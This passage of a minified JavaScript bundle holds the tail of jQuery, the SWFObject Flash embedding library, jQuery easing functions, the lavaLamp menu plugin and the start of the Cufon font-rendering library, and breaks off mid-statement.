null}if(val!==undefined){return this.each(function(){win=getWindow(this);if(win){win.scrollTo(!i?val:jQuery(win).scrollLeft(),i?val:jQuery(win).scrollTop())}else{this[method]=val}})}else{win=getWindow(elem);return win?("pageXOffset"in win)?win[i?"pageYOffset":"pageXOffset"]:jQuery.support.boxModel&&win.document.documentElement[method]||win.document.body[method]:elem[method]}}});function getWindow(elem){return("scrollTo"in elem&&elem.document)?elem:elem.nodeType===9?elem.defaultView||elem.parentWindow:false}jQuery.each(["Height","Width"],function(i,name){var type=name.toLowerCase();jQuery.fn["inner"+name]=function(){return this[0]?jQuery.css(this[0],type,false,"padding"):null};jQuery.fn["outer"+name]=function(margin){return this[0]?jQuery.css(this[0],type,false,margin?"margin":"border"):null};jQuery.fn[type]=function(size){var elem=this[0];if(!elem){return size==null?null:this}if(jQuery.isFunction(size)){return this.each(function(i){var self=jQuery(this);self[type](size.call(this,i,self[type]()))})}return("scrollTo"in elem&&elem.document)?elem.document.compatMode==="CSS1Compat"&&elem.document.documentElement["client"+name]||elem.document.body["client"+name]:(elem.nodeType===9)?Math.max(elem.documentElement["client"+name],elem.body["scroll"+name],elem.documentElement["scroll"+name],elem.body["offset"+name],elem.documentElement["offset"+name]):size===undefined?jQuery.css(elem,type):this.css(type,typeof size==="string"?size:size+"px")}});window.jQuery=window.$=jQuery})(window);
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUtil=new Object();}deconcept.SWFObject=function(_1,id,w,h,_5,c,_7,_8,_9,_a){if(!document.getElementById){return;}this.DETECT_KEY=_a?_a:"detectflash";this.skipDetect=deconcept.util.getRequestParameter(this.DETECT_KEY);this.params=new Object();this.variables=new Object();this.attributes=new Array();if(_1){this.setAttribute("swf",_1);}if(id){this.setAttribute("id",id);}if(w){this.setAttribute("width",w);}if(h){this.setAttribute("height",h);}if(_5){this.setAttribute("version",new deconcept.PlayerVersion(_5.toString().split(".")));}this.installedVer=deconcept.SWFObjectUtil.getPlayerVersion();if(!window.opera&&document.all&&this.installedVer.major>7){deconcept.SWFObject.doPrepUnload=true;}if(c){this.addParam("bgcolor",c);}var q=_7?_7:"high";this.addParam("quality",q);this.setAttribute("useExpressInstall",false);this.setAttribute("doExpressInstall",false);var _c=(_8)?_8:window.location;this.setAttribute("xiRedirectUrl",_c);this.setAttribute("redirectUrl","");if(_9){this.setAttribute("redirectUrl",_9);}};deconcept.SWFObject.prototype={useExpressInstall:function(_d){this.xiSWFPath=!_d?"expressinstall.swf":_d;this.setAttribute("useExpressInstall",true);},setAttribute:function(_e,_f){this.attributes[_e]=_f;},getAttribute:function(_10){return this.attributes[_10];},addParam:function(_11,_12){this.params[_11]=_12;},getParams:function(){return this.params;},addVariable:function(_13,_14){this.variables[_13]=_14;},getVariable:function(_15){return this.variables[_15];},getVariables:function(){return this.variables;},getVariablePairs:function(){var _16=new Array();var key;var _18=this.getVariables();for(key in _18){_16[_16.length]=key+"="+_18[key];}return _16;},getSWFHTML:function(){var _19="";if(navigator.plugins&&navigator.mimeTypes&&navigator.mimeTypes.length){if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","PlugIn");this.setAttribute("swf",this.xiSWFPath);}_19="<embed type=\"application/x-shockwave-flash\" src=\""+this.getAttribute("swf")+"\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\"";_19+=" id=\""+this.getAttribute("id")+"\" name=\""+this.getAttribute("id")+"\" ";var _1a=this.getParams();for(var key in _1a){_19+=[key]+"=\""+_1a[key]+"\" ";}var _1c=this.getVariablePairs().join("&");if(_1c.length>0){_19+="flashvars=\""+_1c+"\"";}_19+="/>";}else{if(this.getAttribute("doExpressInstall")){this.addVariable("MMplayerType","ActiveX");this.setAttribute("swf",this.xiSWFPath);}_19="<object id=\""+this.getAttribute("id")+"\" classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\""+this.getAttribute("width")+"\" height=\""+this.getAttribute("height")+"\" style=\""+this.getAttribute("style")+"\">";_19+="<param name=\"movie\" value=\""+this.getAttribute("swf")+"\" />";var _1d=this.getParams();for(var key in _1d){_19+="<param name=\""+key+"\" value=\""+_1d[key]+"\" />";}var _1f=this.getVariablePairs().join("&");if(_1f.length>0){_19+="<param name=\"flashvars\" value=\""+_1f+"\" />";}_19+="</object>";}return _19;},write:function(_20){if(this.getAttribute("useExpressInstall")){var _21=new deconcept.PlayerVersion([6,0,65]);if(this.installedVer.versionIsValid(_21)&&!this.installedVer.versionIsValid(this.getAttribute("version"))){this.setAttribute("doExpressInstall",true);this.addVariable("MMredirectURL",escape(this.getAttribute("xiRedirectUrl")));document.title=document.title.slice(0,47)+" - Flash Player Installation";this.addVariable("MMdoctitle",document.title);}}if(this.skipDetect||this.getAttribute("doExpressInstall")||this.installedVer.versionIsValid(this.getAttribute("version"))){var n=(typeof _20=="string")?document.getElementById(_20):_20;n.innerHTML=this.getSWFHTML();return true;}else{if(this.getAttribute("redirectUrl")!=""){document.location.replace(this.getAttribute("redirectUrl"));}}return false;}};deconcept.SWFObjectUtil.getPlayerVersion=function(){var _23=new deconcept.PlayerVersion([0,0,0]);if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){_23=new deconcept.PlayerVersion(x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split("."));}}else{if(navigator.userAgent&&navigator.userAgent.indexOf("Windows CE")>=0){var axo=1;var _26=3;while(axo){try{_26++;axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash."+_26);_23=new deconcept.PlayerVersion([_26,0,0]);}catch(e){axo=null;}}}else{try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");}catch(e){try{var axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.6");_23=new deconcept.PlayerVersion([6,0,21]);axo.AllowScriptAccess="always";}catch(e){if(_23.major==6){return _23;}}try{axo=new ActiveXObject("ShockwaveFlash.ShockwaveFlash");}catch(e){}}if(axo!=null){_23=new deconcept.PlayerVersion(axo.GetVariable("$version").split(" ")[1].split(","));}}}return _23;};deconcept.PlayerVersion=function(_29){this.major=_29[0]!=null?parseInt(_29[0]):0;this.minor=_29[1]!=null?parseInt(_29[1]):0;this.rev=_29[2]!=null?parseInt(_29[2]):0;};deconcept.PlayerVersion.prototype.versionIsValid=function(fv){if(this.major<fv.major){return false;}if(this.major>fv.major){return true;}if(this.minor<fv.minor){return false;}if(this.minor>fv.minor){return true;}if(this.rev<fv.rev){return false;}return true;};deconcept.util={getRequestParameter:function(_2b){var q=document.location.search||document.location.hash;if(_2b==null){return q;}if(q){var _2d=q.substring(1).split("&");for(var i=0;i<_2d.length;i++){if(_2d[i].substring(0,_2d[i].indexOf("="))==_2b){return _2d[i].substring((_2d[i].indexOf("=")+1));}}}return "";}};deconcept.SWFObjectUtil.cleanupSWFs=function(){var _2f=document.getElementsByTagName("OBJECT");for(var i=_2f.length-1;i>=0;i--){_2f[i].style.display="none";for(var x in _2f[i]){if(typeof _2f[i][x]=="function"){_2f[i][x]=function(){};}}}};if(deconcept.SWFObject.doPrepUnload){if(!deconcept.unloadSet){deconcept.SWFObjectUtil.prepUnload=function(){__flash_unloadHandler=function(){};__flash_savedUnloadHandler=function(){};window.attachEvent("onunload",deconcept.SWFObjectUtil.cleanupSWFs);};window.attachEvent("onbeforeunload",deconcept.SWFObjectUtil.prepUnload);deconcept.unloadSet=true;}}if(!document.getElementById&&document.all){document.getElementById=function(id){return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;
jQuery.easing['jswing']=jQuery.easing['swing'];jQuery.extend(jQuery.easing,{def:'easeOutQuad',swing:function(x,t,b,c,d){return jQuery.easing[jQuery.easing.def](x,t,b,c,d)},easeInQuad:function(x,t,b,c,d){return c*(t/=d)*t+b},easeOutQuad:function(x,t,b,c,d){return-c*(t/=d)*(t-2)+b},easeInOutQuad:function(x,t,b,c,d){if((t/=d/2)<1)return c/2*t*t+b;return-c/2*((--t)*(t-2)-1)+b},easeInCubic:function(x,t,b,c,d){return c*(t/=d)*t*t+b},easeOutCubic:function(x,t,b,c,d){return c*((t=t/d-1)*t*t+1)+b},easeInOutCubic:function(x,t,b,c,d){if((t/=d/2)<1)return c/2*t*t*t+b;return c/2*((t-=2)*t*t+2)+b},easeInQuart:function(x,t,b,c,d){return c*(t/=d)*t*t*t+b},easeOutQuart:function(x,t,b,c,d){return-c*((t=t/d-1)*t*t*t-1)+b},easeInOutQuart:function(x,t,b,c,d){if((t/=d/2)<1)return c/2*t*t*t*t+b;return-c/2*((t-=2)*t*t*t-2)+b},easeInQuint:function(x,t,b,c,d){return c*(t/=d)*t*t*t*t+b},easeOutQuint:function(x,t,b,c,d){return c*((t=t/d-1)*t*t*t*t+1)+b},easeInOutQuint:function(x,t,b,c,d){if((t/=d/2)<1)return c/2*t*t*t*t*t+b;return c/2*((t-=2)*t*t*t*t+2)+b},easeInSine:function(x,t,b,c,d){return-c*Math.cos(t/d*(Math.PI/2))+c+b},easeOutSine:function(x,t,b,c,d){return c*Math.sin(t/d*(Math.PI/2))+b},easeInOutSine:function(x,t,b,c,d){return-c/2*(Math.cos(Math.PI*t/d)-1)+b},easeInExpo:function(x,t,b,c,d){return(t==0)?b:c*Math.pow(2,10*(t/d-1))+b},easeOutExpo:function(x,t,b,c,d){return(t==d)?b+c:c*(-Math.pow(2,-10*t/d)+1)+b},easeInOutExpo:function(x,t,b,c,d){if(t==0)return b;if(t==d)return b+c;if((t/=d/2)<1)return c/2*Math.pow(2,10*(t-1))+b;return c/2*(-Math.pow(2,-10*--t)+2)+b},easeInCirc:function(x,t,b,c,d){return-c*(Math.sqrt(1-(t/=d)*t)-1)+b},easeOutCirc:function(x,t,b,c,d){return c*Math.sqrt(1-(t=t/d-1)*t)+b},easeInOutCirc:function(x,t,b,c,d){if((t/=d/2)<1)return-c/2*(Math.sqrt(1-t*t)-1)+b;return c/2*(Math.sqrt(1-(t-=2)*t)+1)+b},easeInElastic:function(x,t,b,c,d){var s=1.70158;var p=0;var a=c;if(t==0)return b;if((t/=d)==1)return b+c;if(!p)p=d*.3;if(a<Math.abs(c)){a=c;var s=p/4}else var s=p/(2*Math.PI)*Math.asin(c/a);return-(a*Math.pow(2,10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p))+b},easeOutElastic:function(x,t,b,c,d){var s=1.70158;var p=0;var a=c;if(t==0)return b;if((t/=d)==1)return b+c;if(!p)p=d*.3;if(a<Math.abs(c)){a=c;var s=p/4}else var s=p/(2*Math.PI)*Math.asin(c/a);return a*Math.pow(2,-10*t)*Math.sin((t*d-s)*(2*Math.PI)/p)+c+b},easeInOutElastic:function(x,t,b,c,d){var s=1.70158;var p=0;var a=c;if(t==0)return b;if((t/=d/2)==2)return b+c;if(!p)p=d*(.3*1.5);if(a<Math.abs(c)){a=c;var s=p/4}else var s=p/(2*Math.PI)*Math.asin(c/a);if(t<1)return-.5*(a*Math.pow(2,10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p))+b;return a*Math.pow(2,-10*(t-=1))*Math.sin((t*d-s)*(2*Math.PI)/p)*.5+c+b},easeInBack:function(x,t,b,c,d,s){if(s==undefined)s=1.70158;return c*(t/=d)*t*((s+1)*t-s)+b},easeOutBack:function(x,t,b,c,d,s){if(s==undefined)s=1.70158;return c*((t=t/d-1)*t*((s+1)*t+s)+1)+b},easeInOutBack:function(x,t,b,c,d,s){if(s==undefined)s=1.70158;if((t/=d/2)<1)return c/2*(t*t*(((s*=(1.525))+1)*t-s))+b;return c/2*((t-=2)*t*(((s*=(1.525))+1)*t+s)+2)+b},easeInBounce:function(x,t,b,c,d){return c-jQuery.easing.easeOutBounce(x,d-t,0,c,d)+b},easeOutBounce:function(x,t,b,c,d){if((t/=d)<(1/2.75)){return c*(7.5625*t*t)+b}else if(t<(2/2.75)){return c*(7.5625*(t-=(1.5/2.75))*t+.75)+b}else if(t<(2.5/2.75)){return c*(7.5625*(t-=(2.25/2.75))*t+.9375)+b}else{return c*(7.5625*(t-=(2.625/2.75))*t+.984375)+b}},easeInOutBounce:function(x,t,b,c,d){if(t<d/2)return jQuery.easing.easeInBounce(x,t*2,0,c,d)*.5+b;return jQuery.easing.easeOutBounce(x,t*2-d,0,c,d)*.5+c*.5+b}});(function(jQuery){jQuery.fn.lavaLamp=function(o){o=jQuery.extend({target:'li',fx:'swing',speed:500,click:function(){return true},startItem:'',autoReturn:true,returnDelay:0,setOnClick:true,homeTop:0,homeLeft:0,homeWidth:0,homeHeight:0,returnHome:false,autoResize:false},o||{});function getInt(arg){var myint=parseInt(arg);return(isNaN(myint)?0:myint)}if(o.autoResize)jQuery(window).resize(function(){jQuery(o.target+'.selectedLava').trigger('mouseenter')});return this.each(function(){if(jQuery(this).css('position')=='static')jQuery(this).css('position','relative');if(o.homeTop||o.homeLeft){var $home=jQuery('<'+o.target+' class="homeLava"></'+o.target+'>').css({left:o.homeLeft,top:o.homeTop,width:o.homeWidth,height:o.homeHeight,position:'absolute'});jQuery(this).prepend($home)}var path=location.pathname+location.search+location.hash,$selected,$back,$lt=jQuery(o.target+'[class!=noLava]',this),delayTimer,bx=0,by=0;$selected=jQuery(o.target+'.selectedLava',this);if(o.startItem!='')$selected=$lt.eq(o.startItem);if((o.homeTop||o.homeLeft)&&$selected.length<1)$selected=$home;if($selected.length<1){var pathmatch_len=0,$pathel;$lt.each(function(){var thishref=$('a:first',this).attr('href');if(path.indexOf(thishref)>-1&&thishref.length>pathmatch_len){$pathel=$(this);pathmatch_len=thishref.length}});if(pathmatch_len>0){$selected=$pathel}}if($selected.length<1)$selected=$lt.eq(0);$selected=jQuery($selected.eq(0).addClass('selectedLava'));$lt.bind('mouseenter',function(){if(delayTimer){clearTimeout(delayTimer);delayTimer=null}move(jQuery(this))}).click(function(e){if(o.setOnClick){$selected.removeClass('selectedLava');$selected=jQuery(this).addClass('selectedLava')}return o.click.apply(this,[e,this])});$back=jQuery('<li class="backLava"><div class="leftLava"></div><div class="bottomLava"></div><div class="cornerLava"></div></li>').css('position','absolute').prependTo(this);bx=getInt($back.css('borderLeftWidth'))+getInt($back.css('borderRightWidth'))+getInt($back.css('paddingLeft'))+getInt($back.css('paddingRight'));by=getInt($back.css('borderTopWidth'))+getInt($back.css('borderBottomWidth'))+getInt($back.css('paddingTop'))+getInt($back.css('paddingBottom'));if(o.homeTop||o.homeLeft)$back.css({left:o.homeLeft,top:o.homeTop,width:o.homeWidth,height:o.homeHeight});else{$back.css({left:$selected.position().left,top:$selected.position().top,width:$selected.outerWidth()-bx,height:$selected.outerHeight()-by})}jQuery(this).bind('mouseleave',function(){var $returnEl=null;if(o.returnHome)$returnEl=$home;else if(!o.autoReturn)return true;if(o.returnDelay){if(delayTimer)clearTimeout(delayTimer);delayTimer=setTimeout(function(){move($returnEl)},o.returnDelay)}else{move($returnEl)}return true});function move($el){if(!$el)$el=$selected;$back.stop().animate({left:$el.position().left,top:$el.position().top,width:$el.outerWidth()-bx,height:$el.outerHeight()-by},o.speed,o.fx)}})}})(jQuery);
var Cufon=(function(){var m=function(){return m.replace.apply(null,arguments)};var x=m.DOM={ready:(function(){var C=false,E={loaded:1,complete:1};var B=[],D=function(){if(C){return}C=true;for(var F;F=B.shift();F()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",D,false);window.addEventListener("pageshow",D,false)}if(!window.opera&&document.readyState){(function(){E[document.readyState]?D():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");D()}catch(F){setTimeout(arguments.callee,1)}})()}q(window,"load",D);return function(F){if(!arguments.length){D()}else{C?F():B.push(F)}}})(),root:function(){return document.documentElement||document.body}};var n=m.CSS={Size:function(C,B){this.value=parseFloat(C);this.unit=String(C).match(/[a-z%]*$/)[0]||"px";this.convert=function(D){return D/B*this.value};this.convertFrom=function(D){return D/this.value*B};this.toString=function(){return this.value+this.unit}},addClass:function(C,B){var D=C.className;C.className=D+(D&&" ")+B;return C},color:j(function(C){var B={};B.color=C.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(E,D,F){B.opacity=parseFloat(F);return"rgb("+D+")"});return B}),fontStretch:j(function(B){if(typeof B=="number"){return B}if(/%$/.test(B)){return parseFloat(B)/100}return{"ultra-condensed":0.5,"extra-condensed":0.625,condensed:0.75,"semi-condensed":0.875,"semi-expanded":1.125,expanded:1.25,"extra-expanded":1.5,"ultra-expanded":2}[B]||1}),getStyle:function(C){var B=document.defaultView;if(B&&B.getComputedStyle){return new a(B.getComputedStyle(C,null))}if(C.currentStyle){return new a(C.currentStyle)}return new a(C.style)},gradient:j(function(F){var G={id:F,type:F.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},C=F.substr(F.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var E=0,B=C.length,D;E<B;++E){D=C[E].split("=",2).reverse();G.stops.push([D[1]||E/(B-1),D[0]])}return G}),quotedList:j(function(E){var D=[],C=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,B;while(B=C.exec(E)){D.push(B[3]||B[1])}return D}),recognizesMedia:j(function(G){var E=document.createElement("style"),D,C,B;E.type="text/css";E.media=G;try{E.appendChild(document.createTextNode("/**/"))}catch(F){}C=g("head")[0];C.insertBefore(E,C.firstChild);D=(E.sheet||E.styleSheet);B=D&&!D.disabled;C.removeChild(E);return B}),removeClass:function(D,C){var B=RegExp("(?:^|\\s+)"+C+"(?=\\s|$)","g");D.className=D.className.replace(B,"");return D},supports:function(D,C){var B=document.createElement("span").style;if(B[D]===undefined){return false}B[D]=C;return B[D]===C},textAlign:function(E,D,B,C){if(D.get("textAlign")=="right"){if(B>0){E=" "+E}}else{if(B<C-1){E+=" "}}return E},textShadow:j(function(F){if(F=="none"){return null}var E=[],G={},B,C=0;var D=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(B=D.exec(F)){if(B[0]==","){E.push(G);G={};C=0}else{if(B[1]){G.color=B[1]}else{G[["offX","offY","blur"][C++]]=B[2]}}}E.push(G);return E}),textTransform:(function(){var B={uppercase:function(C){return C.toUpperCase()},lowercase:function(C){return C.toLowerCase()},capitalize:function(C){return C.replace(/\b./g,function(D){return D.toUpperCase()})}};return function(E,D){var C=B[D.get("textTransform")];return C?C(E):E}})(),whiteSpace:(function(){var D={inline:1,"inline-block":1,"run-in":1};var C=/^\s+/,B=/\s+$/;return function(H,F,G,E){if(E){if(E.nodeName.toLowerCase()=="br"){H=H.replace(C,"")}}if(D[F.get("display")]){return H}if(!G.previousSibling){H=H.replace(C,"")}if(!G.nextSibling){H=H.replace(B,"")}return H}})()};n.ready=(function(){var B=!n.recognizesMedia("all"),E=false;var D=[],H=function(){B=true;for(var K;K=D.shift();K()){}};var I=g("link"),J=g("style");function C(K){return K.disabled||G(K.sheet,K.media||"screen")}function G(M,P){if(!n.recognizesMedia(P||"all")){return true}if(!M||M.disabled){return false}try{var Q=M.cssRules,O;if(Q){search:for(var L=0,K=Q.length;O=Q[L],L<K;++L){switch(O.type){case 2:break;case 3:if(!G(O.styleSheet,O.media.mediaText)){return false}break;default:break search}}}}catch(N){}return true}function F(){if(document.createStyleSheet){return true}var L,K;for(K=0;L=I[K];++K){if(L.rel.toLowerCase()=="stylesheet"&&!C(L)){return false}}for(K=0;L=J[K];++K){if(!C(L)){return false}}return true}x.ready(function(){if(!E){E=n.getStyle(document.body).isUsable()}if(B||(E&&F())){H()}else{setTimeout(arguments.callee,10)}});return function(K){if(B){K()}else{D.push(K)}}})();function s(D){var C=this.face=D.face,B={"\u0020":1,"\u00a0":1,"\u3000":1};this.glyphs=D.glyphs;this.w=D.w;this.baseSize=parseInt(C["units-per-em"],10);this.family=C["font-family"].toLowerCase();this.weight=C["font-weight"];this.style=C["font-style"]||"normal";this.viewBox=(function(){var F=C.bbox.split(/\s+/);var E={minX:parseInt(F[0],10),minY:parseInt(F[1],10),maxX:parseInt(F[2],10),maxY:parseInt(F[3],10)};E.width=E.maxX-E.minX;E.height=E.maxY-E.minY;E.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return E})();this.ascent=-parseInt(C.ascent,10);this.descent=-parseInt(C.descent,10);this.height=-this.ascent+this.descent;this.spacing=function(L,N,E){var O=this.glyphs,M,K,G,P=[],F=0,J=-1,I=-1,H;while(H=L[++J]){M=O[H]||this.missingGlyph;if(!M){continue}if(K){F-=G=K[H]||0;P[I]-=G}F+=P[++I]=~~(M.w||this.w)+N+(B[H]?E:0);K=M.k}P.total=F;return P}}function f(){var C={},B={oblique:"italic",italic:"oblique"};this.add=function(D){(C[D.style]||(C[D.style]={}))[D.weight]=D};this.get=function(H,I){var G=C[H]||C[B[H]]||C.normal||C.italic||C.oblique;if(!G){return null}I={normal:400,bold:700}[I]||parseInt(I,10);if(G[I]){return G[I]}var E={1:1,99:0}[I%100],K=[],F,D;if(E===undefined){E=I>400}if(I==500){I=400}for(var J in G){if(!k(G,J)){continue}J=parseInt(J,10);if(!F||J<F){F=J}if(!D||J>D){D=J}K.push(J)}if(I<F){I=F}if(I>D){I=D}K.sort(function(M,L){return(E?(M>=I&&L>=I)?M<L:M>L:(M<=I&&L<=I)?M>L:M<L)?-1:1});return G[K[0]]}}function r(){function D(F,G){if(F.contains){return F.contains(G)}return F.compareDocumentPosition(G)&16}function B(G){var F=G.relatedTarget;if(!F||D(this,F)){return}C(this,G.type=="mouseover")}function E(F){C(this,F.type=="mouseenter")}function C(F,G){setTimeout(function(){var H=d.get(F).options;m.replace(F,G?h(H,H.hover):H,true)},10)}this.attach=function(F){if(F.onmouseenter===undefined){q(F,"mouseover",B);q(F,"mouseout",B)}else{q(F,"mouseenter",E);q(F,"mouseleave",E)}}}function u(){var C=[],D={};function B(H){var E=[],G;for(var F=0;G=H[F];++F){E[F]=C[D[G]]}return E}this.add=function(F,E){D[F]=C.push(E)-1};this.repeat=function(){var E=arguments.length?B(arguments):C,F;for(var G=0;F=E[G++];){m.replace(F[0],F[1],true)}}}function A(){var D={},B=0;function C(E){return E.cufid||(E.cufid=++B)}this.get=function(E){var F=C(E);return D[F]||(D[F]={})}}function a(B){var D={},C={};this.extend=function(E){for(var F in E){if(k(E,F)){D[F]=E[F]}}return this};this.get=function(E){return D[E]!=undefined?D[E]:B[E]};this.getSize=function(F,E){return C[F]||(C[F]=new n.Size(this.get(F),E))};this.isUsable=function(){return !!B}}function q(C,B,D){if(C.addEventListener){C.addEventListener(B,D,false)}else{if(C.attachEvent){C.attachEvent("on"+B,function(){return D.call(C,window.event)})}}}function v(C,B){var D=d.get(C);if(D.options){return C}if(B.hover&&B.hoverables[C.nodeName.toLowerCase()]){b.attach(C)}D.options=B;return C}function j(B){var C={};return function(D){if(!k(C,D)){C[D]=B.apply(null,arguments)}return C[D]}}function c(F,E){var B=n.quotedList(E.get("fontFamily").toLowerCase()),D;for(var C=0;D=B[C];++C){if(i[D]){return i[D].get(E.get("fontStyle"),E.get("fontWeight"))}}return null}function g(B){return document.getElementsByTagName(B)}function k(C,B){return C.hasOwnProperty(B)}function h(){var C={},B,F;for(var E=0,D=arguments.length;B=arguments[E],E<D;++E){for(F in B){if(k(B,F)){C[F]=B[F]}}}return C}function o(E,M,C,N,F,D){var K=document.createDocumentFragment(),H;if(M===""){return K}var L=N.separate;var I=M.split(p[L]),B=(L=="words");if(B&&t){if(/^\s/.test(M)){I.unshift("")}if(/\s$/.test(M)){I.push("")}}for(var J=0,G=I.length;J<G;++J){H=z[N.engine](E,B?n.textAlign(I[J],C,J,G):I[J],C,N,F,D,J<G-1);if(H){K.appendChild(H)}}return K}function l(D,M){var C=D.nodeName.toLowerCase();if(M.ignore[C]){return}var E=!M.textless[C];var B=n.getStyle(v(D,M)).extend(M);var F=c(D,B),G,K,I,H,L,J;if(!F){return}for(G=D.firstChild;G;G=I){K=G.nodeType;I=G.nextSibling;if(E&&K==3){if(H){H.appendData(G.data);D.removeChild(G)}else{H=G}if(I){continue}}if(H){D.replaceChild(o(F,n.whiteSpace(H.data,B,H,J),B,M,G,D),H);H=null}if(K==1){if(G.firstChild){if(G.nodeName.toLowerCase()=="cufon"){z[M.engine](F,null,B,M,G,D)}else{arguments.callee(G,M)}}J=G}}}var t=" ".split(/\s+/).length==0;var d=new A();var b=new r();var y=new u();var e=false;var z={},i={},w={autoDetect:false,engine:null,forceHitArea:false,hover:false,hoverables:{a:true},ignore:{applet:1,canvas:1,col:1,colgroup:1,head:1,iframe:1,map:1,optgroup:1,option:1,script:1,select:1,style:1,textarea:1,title:1,pre:1},printable:true,selector:(window.Sizzle||(window.jQuery&&function(B){return jQuery(B)})||(window.dojo&&dojo.query)||(window.Ext&&Ext.query)||(window.YAHOO&&YAHOO.util&&YAHOO.util.Selector&&YAHOO.util.Selector.query)||(window.$$&&function(B){return $$(B)})||(window.$&&function(B){return $(B)})||(document.querySelectorAll&&function(B){return document.querySelectorAll(B)})||g),separate:"words",textless:{dl:1,html:1,ol:1,table:1,tbody:1,thead:1,tfoot:1,tr:1,ul:1},textShadow:"none"};var p={words:/\s/.test("\u00a0")?/[^\S\u00a0]+/:/\s+/,characters:"",none:/^/};m.now=function(){x.ready();return m};m.refresh=function(){y.repeat.apply(y,arguments);return m};m.registerEngine=function(C,B){if(!B){return m}z[C]=B;return m.set("engine",C)};m.registerFont=function(D){if(!D){return m}var B=new s(D),C=B.family;if(!i[C]){i[C]=new f()}i[C].add(B);return m.set("fontFamily",'"'+C+'"')};m.replace=function(D,C,B){C=h(w,C);if(!C.engine){return m}if(!e){n.addClass(x.root(),"cufon-active cufon-loading");n.ready(function(){n.addClass(n.removeClass(x.root(),"cufon-loading"),"cufon-ready")});e=true}if(C.hover){C.forceHitArea=true}if(C.autoDetect){delete C.fontFamily}if(typeof C.textShadow=="string"){C.textShadow=n.textShadow(C.textShadow)}if(typeof C.color=="string"&&/^-/.test(C.color)){C.textGradient=n.gradient(C.color)}else{delete C.textGradient}if(!B){y.add(D,arguments)}if(D.nodeType||typeof D=="string"){D=[D]}n.ready(function(){for(var F=0,E=D.length;F<E;++F){var G=D[F];if(typeof G=="string"){m.replace(C.selector(G),C,true)}else{l(G,C)}}});return m};m.set=function(B,C){w[B]=C;return m};return m})();Cufon.registerEngine("canvas",(function(){var b=document.createElement("canvas");if(!b||!b.getContext||!b.getContext.apply){return}b=null;var a=Cufon.CSS.supports("display","inline-block");var e=!a&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var f=document.createElement("style");f.type="text/css";f.appendChild(document.createTextNode(("cufon{text-indent:0;}@media screen,projection{cufon{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(e?"":"font-size:1px;line-height:1px;")+"}cufon cufontext{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;text-indent:-10000in;}"+(a?"cufon canvas{position:relative;}":"cufon canvas{position:absolute;}")+"}@media print{cufon{padding:0;}cufon canvas{display:none;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(f);function d(p,h){var n=0,m=0;var g=[],o=/([mrvxe])([^a-z]*)/g,k;generate:for(var j=0;k=o.exec(p);++j){var l=k[2].split(",");switch(k[1]){case"v":g[j]={m:"bezierCurveTo",a:[n+~~l[0],m+~~l[1],n+~~l[2],m+~~l[3],n+=~~l[4],m+=~~l[5]]};break;case"r":g[j]={m:"lineTo",a:[n+=~~l[0],m+=~~l[1]]};break;case"m":g[j]={m:"moveTo",a:[n=~~l[0],m=~~l[1]]};break;case"x":g[j]={m:"closePath"};break;case"e":break generate}h[g[j].m].apply(h,g[j].a)}return g}function c(m,k){for(var j=0,h=m.length;j<h;++j){var g=m[j];k[g.m].apply(k,g.a)}}return function(V,w,P,t,C,W){var k=(w===null);if(k){w=C.getAttribute("alt")}var A=V.viewBox;var m=P.getSize("fontSize",V.baseSize);var B=0,O=0,N=0,u=0;var z=t.textShadow,L=[];if(z){for(var U=z.length;U--;){var F=z[U];var K=m.convertFrom(parseFloat(F.offX));var I=m.convertFrom(parseFloat(F.offY));L[U]=[K,I];if(I<B){B=I}if(K>O){O=K}if(I>N){N=I}if(K<u){u=K}}}var Z=Cufon.CSS.textTransform(w,P).split("");var E=V.spacing(Z,~~m.convertFrom(parseFloat(P.get("letterSpacing"))||0),~~m.convertFrom(parseFloat(P.get("wordSpacing"))||0));if(!E.length){return null}var h=E.total;O+=A.width-E[E.length-1];u+=A.minX;var s,n;if(k){s=C;n=C.firstChild}else{s=document.createElement("cufon");s.className="cufon cufon-canvas";s.setAttribute("alt",w);n=document.createElement("canvas");s.appendChild(n);if(t.printable){var S=document.createElement("cufontext");S.appendChild(document.createTextNode(w));s.appendChild(S)}}var aa=s.style;var H=n.style;var j=m.convert(A.height);var Y=Math.ceil(j);var M=Y/j;var G=M*Cufon.CSS.fontStretch(P.get("fontStretch"));var J=h*G;var Q=Math.ceil(m.convert(J+O-u));var o=Math.ceil(m.convert(A.height-B+N));n.width=Q;n.height=o;H.width=Q+"px";H.height=o+"px";B+=A.minY;H.top=Math.round(m.convert(B-V.ascent))+"px";H.left=Math.round(m.convert(u))+"px";var r=Math.max(Math.ceil(m.convert(J)),0)+"px";if(a){aa.width=r;aa.height=m.convert(V.height)+"px"}else{aa.paddingLeft=r;aa.paddingBottom=(m.convert(V.height)-1)+"px"}var 